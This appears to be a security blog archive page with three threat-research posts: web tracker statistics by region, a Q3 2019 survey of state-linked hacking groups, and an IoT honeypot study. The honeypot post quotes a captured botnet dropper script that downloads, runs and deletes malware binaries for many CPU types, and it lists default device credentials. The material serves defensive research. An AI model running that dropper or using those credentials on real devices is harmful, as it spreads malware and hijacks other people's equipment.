In China, the trackers most often encountered by our users come from Alibaba, which collects data on user behavior and interests in the group’s own online stores: alibaba.com, aliexpress.com, taobao.com. Since AliExpress is known practically worldwide, Alibaba’s tracker also features in the Top 20 in Azerbaijan, Belarus, China, Hong Kong, Kazakhstan, Libya, Macau, Moldova, Malaysia, Russia, Taiwan, Tajikistan, Uzbekistan, and Yemen. Moreover, its presence was registered in almost all countries where our security solutions are used. In second place is the “Chinese Google” — Baidu.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

South Korea

Here, as in most countries with an unfenced Internet, DoubleClick leads the way. That said, the local giant Naver, already known as the “Korean Google,” is catching up. Also in the top list are many local companies, such as Daum Communications (Kakao since 2014) and the advertising platform ADOP Inc.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");


The Japanese tracking market is not that much different from the global one; except that the Top 20 includes local firms: MicroAd (marketing), Samurai Factory, i-mobile (advertising platform), and others.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");


The CIS (Armenia, Azerbaijan, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan, Uzbekistan), is dominated by the Russian-speaking segment of the Internet, with well-developed online technologies and local Internet giants, such as Mail.ru Group and Yandex. But as in most countries around the world, the local leaders are challenged by DoubleClick.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");


The Internet is a common space for all people of the world. Wherever they are, be it Peru, Djibouti, or Germany, most use the same resources. The degree of distinctiveness and detachment of certain geographical Internet spaces depends on many factors, for example, the development of a country’s Internet technologies, what languages are spoken there, and how open or closed the government politics and the society in general is.

As we saw from the statistics, tech giants that collect and analyze data to show us targeted advertising are present practically everywhere in the world. And it is these companies that store the most data about people from all over the planet.

On the one hand, data collection and analysis means that we are shown content and products of interest to us, and vendors get to improve their offerings based on user experience (UX). But on the other, the idea of all our online actions being harvested and used to supplement a profile that some company has on us is not overly pleasant. To guard against unwanted tracking, you can simply block tracking services from slipping their “beacons” into downloaded content. For this, you need to activate the DNT (Private Browsing) component in Kaspersky products. See the Kaspersky Security Cloud guides for details of how to do so.

2019. október 16.

APT trends report Q3 2019

For more than two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q3 2019.

Readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact intelreports@kaspersky.com.

The most remarkable findings

On August 30, Ian Beer from Google’s Project Zero team published an extensive analysis of at least 14 iOS zero-days found in the wild and used in five exploitation chains to escalate privileges by an unknown threat actor. Although the use of watering-hole attacks was popular in the early 2010s, it has now become less common. According to Google, a number of waterholed websites were delivering the exploits, possibly as far back as three years ago (based on September 2016 usage of the first exploit chain). While the blog contains no details about the compromised sites or if they are still active, it claims that these websites receive “thousands of visitors per week”. The first stage Webkit exploit used to infect visitors makes no discrimination other than that the victim uses an iPhone and browses the website with Safari, although the vulnerability would also have worked in other browsers such as Chrome. The lack of victim discrimination would point to a relatively non-targeted attack, but the not-so-high estimate of the number of visitors to the waterholed sites seems to indicate that the attack was targeted at some communities: it is likely that these waterholed sites were all dedicated to some common topic. The blog does not contains many details regarding who the actor behind this attack is, but the high technical capabilities needed to deliver and install this malware, and keep the exploitation chains up-to-date for more than two years, shows a high level of resources and dedication. Upon infection, the malware itself will be invisible to the victim. It pings its C2 every 60 seconds for new commands. It is able to get access to all kinds of files in the system, as well as tracking GPS position. There is no mechanism to survive a reboot, but the capability to steal signing-in cookies from a victim’s account can keep providing the attackers with access to this data.

Shortly after the Google blogpost, Volexity published more details about the waterholing websites used in the attack to distribute the malware, pointing to a “strategic web compromise targeting Uyghurs”. Citizen Lab published the Android counterpart for this story, stating that between November 2018 and May 2019, senior members of Tibetan groups were targeted by the same actor (this time dubbed POISON CARP by Citizen Lab) using malicious links in WhatsApp text exchanges, with the attackers posing as NGO workers, journalists and other fake personas. The links led to code designed to exploit web browser vulnerabilities to install spyware on iOS and Android devices, and in some cases to OAuth phishing pages.

At the beginning of September 2019, Zerodium, a zero-day brokerage firm, indicated that a zero-day for Android was now worth more than one for iOS: the exploit broker is now willing to pay $2.5 million for a zero-click Android zero-day with persistence. This is a significant increase on the company’s previous payout ceiling of $2 million for remote iOS jailbreaks. By contrast, Zerodium has also reduced payouts for Apple one-click exploits. On the same day, a high-severity zero-day was found in the v412 (Video4Linux) driver, the Android media driver. This vulnerability, which could enable privilege escalation, was not included in Google’s September security update. A few days later, an Android flaw was identified that left more than a billion Samsung, Huawei, LG and Sony smartphones vulnerable to an attack that would allow an attacker to gain full access to emails on a compromised device using an SMS message.

Russian-speaking activity

Turla (aka Venomous Bear, Uroburos and Waterbug) has made significant changes to its toolset. While investigating malicious activity in Central Asia, we identified a new backdoor that we attribute with medium confidence to this APT group. The malware, named Tunnus, is a.NET-based backdoor with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the C2 infrastructure has been built using compromised sites with vulnerable WordPress installations. According to our telemetry, Tunnus activity started in March and was still active when we published our private report in July.

Turla has also wrapped its notorious JavaScript KopiLuwak malware in a dropper called Topinambour, a new.NET file that the group is using to distribute and drop KopiLuwak through infected installation packages for legitimate software programs such as VPNs. Some of the changes are to help Turla evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. The malware is almost completely ‘fileless’: the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer’s registry for the malware to access when ready. Two KopiLuwak analogues – the.NET RocketMan Trojan and the PowerShell MiamiBeach Trojan – are used for cyber-espionage. We think that the threat actor deploys these versions where their targets are protected with security software capable of detecting KopiLuwak. All three implants can fingerprint targets, gather information on system and network adapters, steal files and download and execute additional malware. MiamiBeach is also able to take screenshots.

In September, Zebrocy spear-phished multiple NATO and alliance partners throughout Europe, attempting to gain access to email communications, credentials and sensitive documents. This campaign is similar to past Zebrocy activity, with target-relevant content used within emails, and ZIP attachments containing harmless documents alongside executables with altered icons and identical filenames. The group also makes use of remote Word templates pulling contents from the legitimate Dropbox file sharing site. In this campaign, Zebrocy targeted defense and diplomatic targets located throughout Europe and Asia with its Go backdoor and Nimcy variants.

Chinese-speaking activity

HoneyMyte (aka Temp.Hex and Mustang Panda), which has been active for several years, has adopted different techniques to perform its attacks over the past couple of years, and has focused on various targeting profiles. In previous attacks, conducted from mid-2018, this threat actor deployed PlugX implants, as well as multi-stage PowerShell scripts resembling CobaltStrike. That campaign targeted government entities in Myanmar, Mongolia, Ethiopia, Vietnam and Bangladesh. We recently described a new set of activities from HoneyMyte involving attacks that relied on several types of tools. They include: (a) PlugX implants; (b) a multi-stage package resembling the CobaltStrike stager and stageless droppers with PowerShell and VB scripts,.NET executables, cookie-stealers and more; (c) ARP poisoning with DNS hijacking malware, to deliver poisoned Flash and Microsoft updates over http for lateral movement; (d) various system and network utilities. Based on the targeting of government organizations related to natural resource management in Myanmar and a major continental organization in Africa, we assess that one of the main motivations of HoneyMyte is gathering geo-political and economic intelligence. While a military organization was targeted in

Bangladesh, it’s possible that the individual targets were related to geopolitical activity in the region.

Since the beginning of 2019, we have observed a spike in LuckyMouse activity, both in Central Asia and the Middle East. For these new campaigns, the attackers seem to focus on telecommunications operators, universities and governments. The infection vectors are direct compromise, spear phishing and, possibly, watering holes. LuckyMouse hasn’t changed any of its TTPs (Tactics, Techniques and Procedures), continuing to rely on its own tools to get a foothold in the victim’s network. The new campaigns consist of HTTPBrowser as a first stage, followed by the Soldier Trojan as a second-stage implant. The attackers made a change to their infrastructure, as they seem to solely rely on IPv4 addresses instead of domain names for their C2s, which can be seen as an attempt by them to limit correlation. The campaigns from this actor were still active at the time we published our latest private report on LuckyMouse in September.

Our January 2018 private report ‘ShaggyPanther – Chinese-speaking cluster of activity in APAC’ introduced ShaggyPanther, a previously unseen malware and intrusion set targeting Taiwan and Malaysia. Related components and activity span back over a decade, with similar code maintaining compilation timestamps as far back as 2004. Since then ShaggyPanther activity has been detected in several more locations: the most recent detections occurred on servers in Indonesia in July, and, somewhat surprisingly, in Syria in March. The newer 2018 and 2019 backdoor code maintains a new layer of obfuscation and no longer maintains clear-text C2 strings. Since our original release, we have identified an initial server-side infection vector from this actor, using SinoChoper/ChinaChopper, a commonly used webshell shared across multiple Chinese-speaking actors. SinoChopper is not only used to perform host identification and backdoor delivery but also email archive theft and additional activity. Though not all incidents can be traced back to server-side exploitation, we did detect a couple of cases and obtained information about their staged install process. In 2019 we observed ShaggyPanther targeting Windows servers.

Middle East

On August 1, Dragos published an overview of attacks called ‘Oil and Gas Threat Perspective Summary’, which references an alleged new threat actor they call Hexane. According to the report, “HEXANE targets oil and gas and telecommunications in Africa, the Middle East, and Southwest Asia”. Dragos claims to have identified the group in May 2019, associating it with OilRig and CHRYSENE. Although no IoCs have been made publicly available, some researchers have shared hashes in a Twitter thread in response to the Dragos announcement. Our analysis reveals some low-confidence similarities with OilRig based on TTPs, which is something that Dragos also mentions in its research. If this is indeed the case, the recent leaks from Lab Dookhtegan and GreenLeakers offer several hypotheses about this group’s emergence. Due to exposure and leaks, OilRig may simply have changed its toolset and continued to operate as usual: this would imply a quick and flexible response to the leaks from this actor. Or perhaps some of the OilRig TTPs were adopted by a new group that seems to have similar interests. Hexane’s activity appears to have started around September 2018 with a second wave of activity starting in May 2019. In all cases, the artefacts used in the attacks are relatively unsophisticated. The constant evolution of the droppers seems to indicate a trial-and-error period where attackers were testing how best to evade detection. The TTPs we can link to previous OilRig activity include the described trial-and-error process, the use of simplistic unsophisticated droppers distributed through spear phishing and DNS-based C2 exfiltration.

TortoiseShell is a new cluster of activities associated with an unknown APT actor, revealed by Symantec on September 18, 2019. Symantec claims that the first signs of activity were seen in July 2018, and are still active one year later; Kaspersky has seen different TortoiseShell artifacts dating back to January 2018. To date, all registered attacks, according to our telemetry, are in Saudi Arabia. Symantec’s report also confirms that the majority of the infections they found were in the same location. The attackers deploy their Syskit backdoor and then use it for reconnaissance. Other tools deployed on the victim machines are designed to collect files and pack them using RAR, gathering further system information. In one case, the attackers deployed the TightVNC remote administration tool to obtain full access to a machine. Symantec mentions traces of OilRig tools in some of the victims, something which we cannot confirm. Also, they mention in their blogpost the possibility that this was distributed through a supply chain attack. We were able to see the malware being distributed through a fake application distributed from a specifically created website for war veterans around two months before the publication of our report. The website was activated shortly after we published our report during a national holiday period in Saudi Arabia. However, we didn’t find any compromised application that could suggest a supply chain attack.

Southeast Asia and the Korean Peninsula

Recently we discovered new Android malware disguised as a mobile messenger or as cryptocurrency-related applications. The new malware has several connections with KONNI, a Windows malware strain that has been used in the past to target a human rights organization and an individual/organization with an interest in Korean Peninsula affairs. KONNI has also previously targeted cryptocurrencies. The infected apps don’t steal cryptocurrencies from a specific trading application or switch wallet addresses; they implement full-featured functionalities to control an infected Android device and steal personal cryptocurrency using these features. We worked closely with a local CERT in order to take down the attacker’s server, giving us a chance to investigate it.

We recently tracked new BlueNoroff activity. In particular, we identified a bank in Myanmar that was compromised by this actor and promptly contacted it to share the IoCs we had found. This collaboration allowed us to obtain valuable information on how the attackers move laterally to access high value hosts, such as those owned by the bank’s system engineers interacting with SWIFT. They use a public login credential dumper and homemade PowerShell scripts for lateral movement. BlueNoroff also employs new malware with an uncommon structure, probably to slow down analysis. Depending on the command line parameters, this malware can run as a passive backdoor, an active backdoor or a tunneling tool; we believe the group runs this tool in different modes depending on the situation. Moreover, we found another type of PowerShell script used by this threat actor when it attacked a target in Turkey. This PowerShell script has similar functionality to those used previously, but BlueNoroff keeps changing it to evade detection.

Kaspersky observed a recent campaign utilizing a piece of malware referred to by FireEye as DADJOKE. This malware was first used in the wild in January 2019 and has undergone constant development since then. We have only observed this malware being used in a small number of active campaigns since January, all targeting government, military, and diplomatic entities in the Southeast Asia region. The latest campaign was conducted on August 29 and seems to have targeted only a select few individuals working for a military organization.

The Andariel APT group, considered to be a sub-group of Lazarus, was initially described by the South Korean Financial Security Institute (FSI) in 2017. This threat actor has traditionally focused on geopolitical espionage and financial intelligence in South Korea. We have released several private intelligence reports on the group. We recently observed new efforts by this actor to build a new C2 infrastructure targeting vulnerable Weblogic servers, in this case exploiting CVE-2017-10271. Following a successful breach, the attackers implanted malware signed with a legitimate signature belonging to a South Korean security software vendor. Thanks to the quick response of the South Korean CERT, this signature was soon revoked. The malware is a brand new type of backdoor, called ApolloZeus, started by a shellcode wrapper with complex configuration data. This backdoor uses a relatively large shellcode in order to make analysis difficult. In addition, it implements a set of features to execute the final payload discreetly. The discovery of this malware allowed us to find several related samples, as well as documents used by the attackers to distribute it, providing us with a better understanding of the campaign. Indeed, we believe this attack is an early preparation stage for a new campaign, which also points to the attacker’s intentions to replace their malware framework with the newly discovered artifacts.

Other interesting discoveries

The well-known Shadow Brokers leak Lost in Translation included an interesting Python script –sigs.py – that contained lots of functions to check if a system had already been compromised by another threat actor. Each check is implemented as a function that looks for a unique signature in the system, for example, a file with a unique name or registry path. Although some checks are empty, 44 entries are listed in sigs.py, many of them related to unknown APTs that have not yet been publicly described. In 2018, we identified the APT described as the 27th function of the sigs.py file, which we call DarkUniverse. We assess with medium confidence that DarkUniverse is connected with the ItaDuke set of activity due to unique code overlaps. The main component is a rather simple DLL with only one exported function that implements persistence, malware integrity, communication with the C2 and control over other modules. We found about 20 victims in Western Asia and Northeastern Africa, including medical institutions, atomic energy bodies, military organizations and telecommunications companies.

Since the beginning of 2019, we have observed the operation of new RCS (Remote Control System) implants for Android. RCS uses watermarks for different customers, which allowed us to correlate post-leak activity in the wild to obtain a global picture of how this malware is still being used, including the most recent cases. We detected RCS being used in Ethiopia in February, while additional samples with the same watermark were also detected in Morocco. The deployment method used depends on the actor, but the most common method consists of sending a legitimate backdoored application with RCS directly to the target using IM services (Telegram and WhatsApp).

Final thoughts

In seeking to evade detection, threat actors are refreshing their toolsets. This quarter, we have seen this clearly in Turla’s development of its Tunnus backdoor and Topinambour dropper.

However, when a new campaign is observed, it’s not always immediately clear whether the tools used are the result of an established threat actor revamping its tools or a completely new threat actor making use of the tools developed by an existing APT group. In the case of Hexane, for example, it’s unclear if this is a new development by OilRig, or the use of OilRig TTPs by a new group with similar interests in the Middle East, Africa and Southwest Asia.

Korean-focused APT campaigns continue to dominate activities in Southeast Asia, a trend we first noted in our Q2 report.

Despite the lower payouts by Zerodium for iOS exploits relative to those for Android, it’s clear that mobile exploits continue to fetch very high prices. Our research into the ongoing use of RCS implants for Android and the revelations about the use of multiple iOS zero-days as described by Google and Citizen Lab underline the fact that mobile platforms have now become a standard aspect of APT attacks.

As always, we would note that our reports are the product of our visibility into the threat landscape. However, it needs to be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.

2019. október 15.

IoT: a malware story

Since 2008, cyber-criminals have been creating malware to attack IoT-devices, such as routers and other types of network equipment. You will find a lot of statistics on this on Securelist, most notably, here and here. The main problem with these IoT/embedded devices is that one simply cannot install any kind of security software. How do we deal with that?

The best option for tracking attacks, catching malware and getting an overview of attacks in this area is to use honeypots.

About honeypots

There are three common types of honeypot:

  • Low-interaction honeypots. These simulate services such as Telnet, SSH and web servers. The attacker or attacking system is tricked into thinking it is a real vulnerable system and running its malicious commands and payload.
  • High-interaction honeypots. These are real systems that require additional steps to restrict malicious activities and avoid compromising further systems, but it has the advantage of actually running a fully POSIX-capable system. This means that any future attempts to identify the hosts using techniques not already emulated by low-interaction honeypots will fail, thus making the attacking scripts believe it is a real device.
  • Medium-interaction honeypots. These are combinations of the two that offer more functionality than low-interaction honeypots but less than high-interaction honeypots.

Ideally, it is best to operate only high-Interaction honeypots. Unfortunately, due to the high volume of attacks, these types of honeypots cannot scale, and the environment needs to be reset for every new connection. As such, medium-interaction honeypots are the type most commonly used, and the most popular open-source projects are Cowrie and Dionaea.

We work with all three types of honeypots, and we have even created a different type, the sensor honeypot, which we will cover below.

Honeypot deployment

Working with honeypots implies taking security into consideration at every step. A system vulnerable to attack or a system under attack can put you and others at risk.

A major step when running honeypots is planning a network layout before getting the honeypots running. This includes defining what activities should be monitored, and how data is collected and processed. Over the past years, we have created a honeypot infrastructure, extending and improving it continuously. We created our own modular approach to this, to deal with system management, updates and data processing. The main idea is to be able to deploy multiple honeypots with ease to try to keep maintenance costs as low as possible.

Residential vs. “Corporate” IP addresses

Our telemetry data suggests that smart botnet operators check the network AS name and tend to target only IP addresses belonging to internet service providers supplying Internet connection to home users. The reason is simple: if there is a router showing up on an Amazon/DigitalOcean-owned IP, this might be a sign that the machine could be a VPS (virtual private server), rather than a SoHo Router sitting inside somebody’s home.

Using the same IP address for a long time

Cycling through IP addresses is quite important. Botnet owners try to monitor honeypots on their own, so after some time, public IP addresses may get flagged by cybercriminals, which results in fewer attacks. Furthermore, we believe there are lists of “honeypot IPs” traded in darknet markets.

Fingerprinting honeypots

Multiple malware families use specific valid commands that are not fully emulated by some honeypots, in order to detect them. Attackers constantly change their fingerprinting methods to bypass the anti-anti-VM techniques. These techniques are implemented in order to check if attackers are trying to probe the honeypot and will return fake data to make the honeypot look real. For example, one malware family reads the contents of /proc/cpuinfo in order to find out the processor type and family. Most Cowrie deployments use the same CPU architecture.

Handling heavy loads

Exposing a popular port (for example, 21. 22. 23. 80) to the Internet will almost immediately attract connection attempts from various hosts, and the longer that port stays open, the more bots will try to “infect” the service. For a static IP address running the same service for more than twelve months, the “infection rate” (the number of sessions trying to infect our honeypot host with malware) was around 4,000 every 15 minutes. The offending IPs are not unique and, from our experience, one attacker attempts to infect a machine multiple times.

A large number of connections generates a lot of stress on both the network and the honeypot emulation stacks. From our experience, we noticed that Cowrie can handle around 10,000 simultaneous sessions per instance. For heavily-loaded honeypots, the solution would be to load-balance the attacking connections at the kernel layer into multiple Docker instances, which can be easily implemented using the kernel’s netfilter module.


So far, we have collected results in our production environment for more than one year. We have deployed more than 50 honeypots around the world, with 20,000 infected sessions every 15 minutes. Below are our results, based on the aggregated data.

Statistics: Telnet

In the first half of 2019, our Telnet honeypots detected a total of more than 105 million attacks that originated with 276,000 unique IP addresses. Compare that with 12 million attacks, originating with 69,000 IP addresses, detected year-on-year in 2018. We are looking at a steady trend for an increase in repeat attacks from attackers’ IP addresses, suggesting increasingly persistent attempts at infecting devices previously known to the attackers.

While Brazil and China remained the leaders in terms of unique IP addresses that served as the origin of Telnet password brute-forcing attacks in the first half of 2019, China took the lead when compared with 2018 year-on-year, with around 30 percent, whereas Brazil was second with 19 percent. Egypt, Russia and the United States were third, fourth and fifth, respectively.

H1 2018 H1 2019 Brazil 28% China 30% China 14% Brazil 19% Japan 11% Egypt 12% USA 5% Russia 11% Greece 5% USA 8% Turkey 4% Vietnam 4% Mexico 4% India 4% Russia 3% Greece 4% South Korea 3% South Korea 4% Italy 2% Japan 4%

Countries that were the sources of Telnet attacks on Kaspersky Laboratory honeypots

Top 10 IoT thread verdicts

It should come as no surprise that most of the positions are occupied by various Mirai modifications: these use exploits, targeting devices that have Telnet turned off. Consider, too, that the malware has been publicly available for a long time, and its code is versatile enough for compiling bots of any level of complexity, for any hardware configuration.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

TOP 10 IoT threat verdicts, first half of 2018

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

TOP 10 IoT threat verdicts, first half of 2019

The statistics were collected from a specially designated group of honeypots that was not touched by the infrastructure changes (no new devices were added), so the statistics relied on the activity of infected devices only. A session stands for a successful password brute-forcing attempt.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

An analysis of logs from an isolated group of honeypots points to a steady trend for a year-on-year decrease in attacker IP addresses but an increase in the number of attacks. The number of active infected devices remains high: tens of thousands of devices attempt to spread malware by both brute-forcing passwords and exploiting various vulnerabilities every month.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Unique IP addressed detected as the origin of attacks on the isolated honeypot group, January through June 2018

Statistics: credentials

Especially in the IoT area, Telnet, SSH and web servers are the most common services available and, therefore, the most-attacked ones. For Telnet and SSH, we store not only malicious payloads but also initial login credentials. This data enables us to identify targeted devices due to the default username/password combinations mainly used by the attackers.

We collected the most widely used username and password combinations for Q3 and Q4 2018, and Q1-Q3 2019; you can find them all in the Appendix. The most common combination by far is “support/support”, followed by “admin/admin”, “default/default” and “root/vizxv”. The first three entries are self-explanatory, but the fourth one is quite interesting: it is the default password for a vulnerable IP camera, as described in Kreb’s blog.

New cameras are probed every quarter as exploits are released into the wild. For example, in Q1 2019, we observed bots trying to infect specific Gpon routers using a specific hard-coded password. Our colleagues at TrendMicro wrote about this at the end of 2018.

Identifying collected credentials for Q3 2018 (left), Q4 2018 (center) and Q1 2019 (right)

Statistics: malware

While common computers usually run on Intel or AMD CPUs (little-endian x86 or x86_64), embedded IoT devices use a broader range of CPU architectures supplied by multiple vendors.

While classifying our samples, we noticed that we had files using both endianness types, designed to be executed on multiple CPU architectures, such as ARM, Intel x86 and MIPS.

Below is a table with all types of samples we collected.

A well-known method used by attackers, once they get access to a device, is to try and deploy their malware for all architectures without any checks. This approach works because only one binary will be executed correctly. Luckily for us, this allows us to grab all the links and download all the samples.

Below is an example of such a script.

#!/bin/bash cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/mips; chmod +x mips; ./mips; rm -rf mips cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/mipsel; chmod +x mipsel; ./mipsel; rm -rf mipsel cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/sh4; chmod +x sh4; ./sh4; rm -rf sh4 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/x86; chmod +x x86; ./x86; rm -rf x86 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/armv7l; chmod +x armv7l; ./armv7l; rm -rf armv7l cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/armv6l; chmod +x armv6l; ./armv6l; rm -rf armv6l cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/i686; chmod +x i686; ./i686; rm -rf i686 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/powerpc; chmod +x powerpc; ./powerpc; rm -rf powerpc cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/i586; chmod +x i586; ./i586; rm -rf i586 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/m68k; chmod +x m68k; ./m68k; rm -rf m68k cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/sparc; chmod +x sparc; ./sparc; rm -rf sparc cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/armv4l; chmod +x armv4l; ./armv4l; rm -rf armv4l cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/armv5l; chmod +x armv5l; ./armv5l; rm -rf armv5l cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://[redacted]/powerpc-440fp; chmod +x powerpc-440fp; ./powerpc-440fp; rm -rf powerpc-440fp

Besides username/password combinations, the type of architecture being targeted is an additional characteristic that helps us to identify other potentially targeted devices.

Attacking countries and networks

The top three countries probing our honeypots were China and Brazil, followed by Egypt and Russia, the latter two 0.1 percent apart. The trend seems to be consistent throughout 2018 and 2019, with slight changes in country rankings.

Below are the top 20 most active attackers and their ASNs, based on attacker IP analysis.

IP ASN country Sessions 198.98.*.* FranTech Solutions (53667) United States 9850914 5.188.*.* Global Layer B.V. (49453) Ireland 8845554 46.101.*.* DigitalOcean, LLC (14061) Germany 6400293 5.188.*.* Global Layer B.V. (57172) Russia 5687846 5.188.*.* Global Layer B.V. (57172) Russia 5668684 5.188.*.* Global Layer B.V. (57172) Russia 5651793 104.168.*.* Hostwinds LLC. (54290) United States 5208208 5.188.*.* Global Layer B.V. (57172) Russia 5183386 5.188.*.* Global Layer B.V. (57172) Russia 4999999 5.188.*.* Global Layer B.V. (49453) Ireland 4997344 5.188.*.* Global Layer B.V. (57172) Russia 4996561 198.199.*.* DigitalOcean, LLC (14061) United States 4731014 68.183.*.* DigitalOcean, LLC (14061) United States 4654696 104.248.*.* DigitalOcean, LLC (14061) United States 4509490 5.188.*.* Global Layer B.V. (49453) Ireland 4413067 88.214.*.* FutureNow Inc. (201912) N/A 4210692 5.188.*.* Global Layer B.V. (49453) Ireland 4209439 134.19.*.* Global Layer B.V. (49453) Netherlands 4206674 185.244.*.* 3W Infra B.V. (60144) Netherlands 4181413 5.188.*.* Global Layer B.V. (49453) Ireland 4128155 Infected sessions

Starting in 2018, we have present two metrics in our data: “all sessions” and “infected sessions”. An infected session is one where there was at least one malware file requested, or dropped, from the Internet. A non-infected session might be one initiated by mistake by a legitimate user, via a mistyped IP address, or by a robot scanning the Internet. We have seen a steady increase in all sessions (Telnet, SSH, web, etc.) opened on our honeypots, and the more honeypots we add to our network, the more traffic we observe, which means that attackers are constantly scanning the Internet in order to infect new devices. In most cases, infected devices are the ones scanning for new hosts on the Internet.

Malware families: 2018 vs. 2019

In terms of detected hashes, we have seen a few changes in top samples trying to attack our honeypots. Overall, in 2018 as well as 2019, Mirai remained the most popular malware family with over 30,000 samples detected in 2018 and almost 25,000 samples detected in the first half of 2019. While the Hajime malware, thoroughly researched by Kaspersky and by Symantec in 2017, was quite active during its prime years, it is almost non-existent on our 2019 charts.

Instead, we have seen an increase from well-known malware families, NyaDrop and Gafgy, trying to infect newer devices.

Below are our Top 10 samples detected in Q1 2018 and Q1 2019.

Q1 2018 Q1 2019 Backdoor.Linux.Mirai.c 23454 (50.46%) Trojan-Downloader.Linux.NyaDrop.b 24437 (38.57%) Trojan-Downloader.Linux.Hajime.a 8657 (18.62%) Backdoor.Linux.Mirai.b 13960 (22.06%) Backdoor.Linux.Mirai.b 3566 (7.67%) Backdoor.Linux.Mirai.ba 7664 (12.11%) Trojan-Downloader.Linux.NyaDrop.b 3523 (7.58%) Backdoor.Linux.Mirai.ad 1224
(1.92%) Backdoor.Linux.Mirai.ba 2468 (5.31%) Backdoor.Linux.Mirai.au 1185
(1.87%) Trojan-Downloader.Shell.Agent.p 502 (1.08%) Backdoor.Linux.Gafgyt.bj 872 (1.38%) Trojan-Downloader.Shell.Agent.as 426 (0.91%) Trojan-Downloader.Shell.Agent.p 659 (1.04%) Backdoor.Linux.Mirai.n 348 (0.74%) Backdoor.Linux.Gafgyt.az 468 (0.74%) Backdoor.Linux.Gafgyt.ba 339 (0.72%) Backdoor.Linux.Mirai.c 455 (0.72%) Backdoor.Linux.Gafgyt.af 279 (0.60%) Backdoor.Linux.Mirai.h 434 (0.68%) Uberpot

Besides the common honeypots that listen on specific ports, we have also created a multi-port honeypot, named “uberpot”. The idea is simple: the honeypot listens on all TCP and UDP ports and accepts connections, and logs data received and meta information. The main objective is to identify new attack vectors, and attacks on other services and ports, e.g. due to new devices or vendor-specific port configurations.

TCP is clearly king in terms of attacker services, even though we still see some UDP/ICMP traffic directed to our uberpot instances.

In terms of infected sessions, we get hit by around 6,000 daily, but in January 2019, we noticed a spike in traffic with more than 7,500 daily sessions hitting random TCP ports.

In terms of other protocols, UDP and ICMP traffic is quite insignificant compared to TCP. We do not monitor other “exotic” protocols, such as DCCP, SST or ATP.

Attacked protocols on Uberpot

So far, mostly TCP-services have been attacked. Remote Administration Services such as SSH, Telnet, VNC and RDP have been a popular target, in addition to databases and web servers.

Attacked protocols on Uberpot

We continue to improve our systems and sensors, and expand our infrastructure to monitor threats and help protect against these.


